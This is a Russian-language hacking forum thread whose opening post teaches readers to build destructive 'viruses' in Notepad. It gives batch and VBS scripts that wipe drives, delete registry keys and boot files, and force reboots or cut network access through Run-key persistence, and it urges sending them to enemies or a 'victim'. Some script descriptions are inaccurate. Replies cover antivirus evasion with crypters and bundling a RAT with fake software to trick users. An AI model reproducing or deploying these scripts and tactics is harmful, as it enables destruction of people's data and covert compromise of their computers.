http://fastpic.ru/ Сегодня мы узнаем, как создать вирус в блокноте. Это очень просто создавать вирусы и использовать их, но не смейте использовать их на вашем компьютере, так как эти вирусы могут разрушить вашу личную информацию. Где использовать? Вы можете отправить эти вирусы к своим врагам, или если вы хотите попробовать их то лучшее место для этого это компьютерные клубы или приобретайте второй компьютер. Как сделать вирус? Откройте Блокнот(Notepad) Поставьте коды Сохраните его в правильном расширения Готово Давайте начнем. 1.Удаляет все с дисководах компьютера @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Сохранить как «имя вашего файла.bat [Batch File] 2.Удаляет все что хранится в реестре @echo OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* 3.Хорошая шалость для ваших друзей. Это останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD. @echo off Ipconfig /release 4.Отправите другу небольшое сообщение и выключите его компьютер. @echo off msg * ваше сообщение shutdown -c “ваше сообщение” -s Это простой вирус, который заставляет компьютер дать ошибку. Сохранить как (имя файла.VBS) 5.Этот простой вирус, форматируются диски менее чем за 5 секунд. Только диски D, Е и С. Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next 6.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\ 7.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении. echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f echo купи новый комп этот кусок дерьма. PAUSE Теперь пришло время для нескольких очень опасных вирусов. 1.Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы. Не использовать на себя. @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini 2.Этот вирус отключает Интернет навсегда. echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo (ваше сообщение) PAUSE Как сделать их рабочими? Скачать и запустить конвертер. Введите файл Выберите значок Версию и информацию Компилируйте Отправить своей жертве Вот вам конвертер для созданых вирусов. Скачать CONVERTER: https://yadi.sk/d/zLaPVa5ZvxCY8 https://www.virustotal.com/ru/file/...2ea41dd909dd1ec39eeb4a216e1f2d1bea8/analysis/ Наслаждайтесь и будьте осторожны! Удачи. Просторы интернета.
А вообще как вариант если есть доступ к пк жертве, то почему бы не попробовать изменить или удалить рег файл антивируса, чтоб он потом не мешал?
На сколько я понял , после открытия файла , начинает действовать код. Если эти так себе. Где же взять более годные? Очень пригодились бы.
При активации любого файла хочешь ты этого или нет - исполняется код. Любой твой клик - код. Этот форум - код. Эти буквы и текст - код. Люди, - вы чего? Я такими батничками баловался еще в школе, классе в 4.
Немножко ликбеза. У любого антивируса есть несколько модулей обеспечения безопасности юзера. При попадание на компьютер файл сначала сканируется АВ на наличие статических сигнатур (к примеру в файле есть строка "SIGN1") таких сигнатур может быть несколько. Потом, если антивирусу хватает статических сигнатур, что бы сразу поставить детект, то скан останавливается и файл как правило удаляется. Если же в файле присутствует к примеру пару сигнатур подозрительных, но ему не хватает информации, что бы однозначно сказать, что это вирус - происходит следующий этап "Эмуляция исполняемого кода программы". Антивирус проходит код программы и выполняет поведенческий анализ. На этом этапе список сигнатур может дополниться и файл будет опять задетекчен. Этот этап как правило обходят с помощью крипторов. Если вирус прошел первичный анализ и запустился, то это еще не победа. Существует много вариаций как антивирус его найдет. Дам опять же пару примеров. Проактивная защита. У разных аверов этот механизм реализован по разному. Как правило, антивирусы перехватывают вызовы функции (действия программы) и по определенным триггерам определяют может ли данная программа навредить юзеру. Проактивку остановить достатчно сложно, потому что этот метод защиты реализуют как правило на уровне ядра системы(KERNEL MODE). Тут как правило применяют разные методы срыва работы антивируса. Также АВ сканируют оперативную память и опять же ищут в ней сигнатуры в момент, когда программа уже работает. К примеру , Вы спрятали свой вирус внутри криптора. Криптор прошел статический анализ, запустил программу и она висит в памяти уже в своем изначальном виде. Так АВ может найти это место в памяти и уже анализировать изначальную программу. Вывод: не страдайте херней в блокноте. Учите си и асм или покупайте софт.
a я предлагаю отнестись к батникам с СИ. Пример как делал я: Порвал я жопу но не смог собрать ратик без палева и решил не ломать башкою дверь , а попросить открыть ее Создал одностраничник на котором крутится кружок Винды а ниже текст " Устанавливается обновление, не выключайте компьютер из сети" писал в батнике старт на этот адрес а ниже хост скриптом открывал новое сообщение с тем же текстом, которое не закрывается без диспетчера ( таскилоф) и уже под этим делал что хотел. Отключал антивир с меседжом " идет обновление баз <<антивира>>" и поехали. Мой ратник сам устанавливался высылал мне айди и и я подключался. Как же изначально впарить? да легко! Нам нужны БАТНИК какая то фигня без вирусов, к примеру - на тебе нормальный плейер (зависит от теметики где распространяешь) и сам ратник в батнике пишем код чтоб создавал ярлык с иконкой на нужный файл , потом запуск нашего подарка, потом меседжи на подобие, " сканирование завершено" и бла бла бла, чтоб усыпить бдительность и запуск ратника. Пока юзер удостоверится что ты реально скинул ему нормальный файл ратник все сделает. Очень хорошо работало когда скидывал чекеры и парсеры , ведь такое не каждый день подарят и народ сам даже выключал антвивр, хотя мне это и не надо было уже. Конечно же это все старо , но для новичков самое оно.
Да никто уже так не делает давно,зае*али с темами про "Делаем вирус в блокноте",пользуйтесь эксплойтами..
